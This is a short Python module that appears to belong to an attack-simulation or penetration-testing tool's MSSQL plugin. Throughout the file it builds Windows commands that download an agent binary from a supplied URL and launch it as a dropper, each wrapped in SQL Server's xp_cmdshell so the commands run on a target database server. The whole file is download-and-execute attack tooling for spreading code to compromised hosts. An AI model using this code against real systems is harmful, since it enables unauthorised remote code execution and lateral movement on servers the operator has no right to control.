from pathlib import PureWindowsPath

from agentpluginapi import (
    DropperExecutionMode,
    IWindowsAgentCommandBuilder,
    WindowsDownloadMethod,
    WindowsDownloadOptions,
    WindowsRunOptions,
    WindowsShell,
)


def build_mssql_agent_download_command(
    agent_download_url: str,
    agent_destination_path: PureWindowsPath,
    agent_command_builder: IWindowsAgentCommandBuilder,
) -> str:
    agent_command_builder.reset_command()

    download_options = WindowsDownloadOptions(
        agent_destination_path=agent_destination_path,
        download_method=WindowsDownloadMethod.WEB_CLIENT,
        download_url=agent_download_url,
    )
    agent_command_builder.build_download_command(download_options)
    command = agent_command_builder.get_command()
    return _get_mssql_command(command)


def build_mssql_agent_launch_command(
    agent_destination_path: PureWindowsPath,
    agent_command_builder: IWindowsAgentCommandBuilder,
) -> str:
    agent_command_builder.reset_command()

    run_options = WindowsRunOptions(
        agent_destination_path=agent_destination_path,
        dropper_execution_mode=DropperExecutionMode.DROPPER,
        shell=WindowsShell.CMD,
    )
    agent_command_builder.build_run_command(run_options)
    command = agent_command_builder.get_command()
    return _get_mssql_command(command)


def _get_mssql_command(command: str) -> str:
    return f"xp_cmdshell '{command}'"
